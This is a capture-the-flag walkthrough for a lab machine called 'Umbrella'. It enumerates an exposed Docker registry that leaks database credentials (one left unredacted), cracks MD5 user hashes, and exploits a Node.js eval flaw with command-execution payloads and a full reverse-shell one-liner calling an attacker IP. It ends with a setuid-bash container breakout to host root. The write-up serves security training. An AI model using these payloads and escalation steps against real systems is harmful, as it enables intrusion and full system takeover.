# Umbrella

## Enumeration
Using `nmap`, we discover SSH, MySQL on 3306, HTTP [Docker Registry](https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry) on 5000 and HTTP on 8080.

Enumerate the [Docker Registry](https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry#enumeration-using-curl):
```
$ curl http://$IP:5000/v2/_catalog
{"repositories":["umbrella/timetracking"]}
$ curl http://$IP:5000/v2/umbrella/timetracking/tags/list
{"name":"umbrella/timetracking","tags":["latest"]}
$ curl http://$IP:5000/v2/umbrella/timetracking/manifests/latest
...
   "history": [
      {
         "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"NODE_VERSION=19.3.0\",\"YARN_VERSION=1.22.19\",\"DB_HOST=db\",\"DB_USER=root\",\"DB_PASS=Ng1-****REDACTED****\",\"DB_DATABASE=timetracking\",\"LOG_FILE=/logs/tt.log\"],\"Cmd\":[\"node\",\"app.js\"],\"Image\":\"sha256:039f3deb094d2931ed42571037e473a5e2daa6fd1192aa1be80298ed61b110f1\",\"Volumes\":null,\"WorkingDir\":\"/usr/src/app\",\"Entrypoint\":[\"docker-entrypoint.sh\"],\"OnBuild\":null,\"Labels\":null},\"container\":\"527e55a70a337461e3615c779b0ad035e0860201e4745821c5f3bc4dcd7e6ef9\",\"container_config\":{\"Hostname\":\"527e55a70a33\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"NODE_VERSION=19.3.0\",\"YARN_VERSION=1.22.19\",\"DB_HOST=db\",\"DB_USER=root\",\"DB_PASS=Ng1-f3!Pe7-e5?Nf3xe5\",\"DB_DATABASE=timetracking\",\"LOG_FILE=/logs/tt.log\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) \",\"CMD [\\\"node\\\" \\\"app.js\\\"]\"],\"Image\":\"sha256:039f3deb094d2931ed42571037e473a5e2daa6fd1192aa1be80298ed61b110f1\",\"Volumes\":null,\"WorkingDir\":\"/usr/src/app\",\"Entrypoint\":[\"docker-entrypoint.sh\"],\"OnBuild\":null,\"Labels\":{}},\"created\":\"2022-12-22T10:03:08.042002316Z\",\"docker_version\":\"20.10.17\",\"id\":\"7aec279d6e756678a51a8f075db1f0a053546364bcf5455f482870cef3b924b4\",\"os\":\"linux\",\"parent\":\"47c36cf308f072d4b86c63dbd2933d1a49bf7adb87b0e43579d9c7f5e6830ab8\",\"throwaway\":true}"
      },
...
```
Noticing the DB credentials, we get the **first flag**.

## MySQL
```
$ mysql -h $IP -D timetracking -u root -p'Ng1-****REDACTED****'
...
MySQL [timetracking]> show tables;
+------------------------+
| Tables_in_timetracking |
+------------------------+
| users                  |
+------------------------+
1 row in set (0,121 sec)

MySQL [timetracking]> select * from users;
+----------+----------------------------------+-------+
| user     | pass                             | time  |
+----------+----------------------------------+-------+
| claire-r | 2ac9cb7dc02b3c0083eb70898e549b63 |   360 |
| chris-r  | 0d107d09f5bbe40cade3de5c71e9e9b7 |   420 |
| jill-v   | d5c0607301ad5d5c1528962a83992ac8 |   564 |
| barry-b  | 4a04890400b5d7bac101baace5d7e994 | 47893 |
+----------+----------------------------------+-------+
4 rows in set (0,029 sec)
```
The `pass` column seem to contain MD5 hashes. Using CrackStation, we retrieve the actual passwords:
```
2ac9cb7dc02b3c0083eb70898e549b63	Password1
0d107d09f5bbe40cade3de5c71e9e9b7	letmein
d5c0607301ad5d5c1528962a83992ac8	sunshine1
4a04890400b5d7bac101baace5d7e994	sandwich
```

## `claire-r`
Connect as `claire-r` through SSH and read the **user flag** in `user.txt` (the other credentials do not work, they indeed do not appear in `/etc/passwd`).

We also have access to the source code of the Node.js _Time Tracking_ app. at `http://$IP:8080/` (login with the same credentials) in `~/timeTracker-src/`. In `app.js`, we see that the user-provided time expression is insecurely evaluated through `parseInt(eval(request.body.time))`.

Trying a few [Node.js RCE payloads](https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet), we can read files:
```
arguments[1].end(require('child_process').execSync('cat /etc/passwd'))
```
Notice by the way that `claire-r` does not appear, this must be inside a VM/container.

We can also check whether a command exists:
```
require('child_process').execSync('nc')
```
Unfortunately no `nc`, `ncat`, `python*`, ... and no obvious reverse shell seem to work.

However we easily find a [pure Node.js reverse shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#nodejs) which does the trick:
```
(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);var client=new net.Socket();client.connect(4242,"10.*.*.***",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})()
```

## `root` in a container
Listen and stabilize (using `script`) to get a shell as `root`, but inside a container.
```
$ nc -lnvp 4242
...
id
uid=0(root) gid=0(root) groups=0(root)
script -qc /bin/bash /dev/null
root@de0610f51845:/usr/src/app# Ctrl-Z
$ stty raw -echo; fg
root@de0610f51845:/usr/src/app# cd /
```
Investigating a bit...
```
root@de0610f51845:/# mount -l
...
/dev/mapper/ubuntu--vg-ubuntu--lv on /logs type ext4 (rw,relatime)
...
root@de0610f51845:/# cd /logs
root@de0610f51845:/logs# ls -l
...
```
... we notice `/logs` inside the container corresponds to `/home/claire-r/timeTracker-src/logs` on the host.

In that case [there is a very simple priv. esc.](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation#privilege-escalation-with-2-shells-and-host-mount): The container `root` can `setuid` a copy of the host `bash` in the shared directory, which `claire-r` can then use to become the host `root` (and get the **root flag**).
```
claire-r@ctf:~/timeTracker-src/logs$ cp /bin/bash .

root@de0610f51845:/logs# chown root:root bash
root@de0610f51845:/logs# chmod +s bash

claire-r@ctf:~/timeTracker-src/logs$ ./bash -p
bash-5.0# id
uid=1001(claire-r) gid=1001(claire-r) euid=0(root) egid=0(root) groups=0(root),1001(claire-r)
bash-5.0# cat /root/root.txt
THM{**REDACTED**}
```
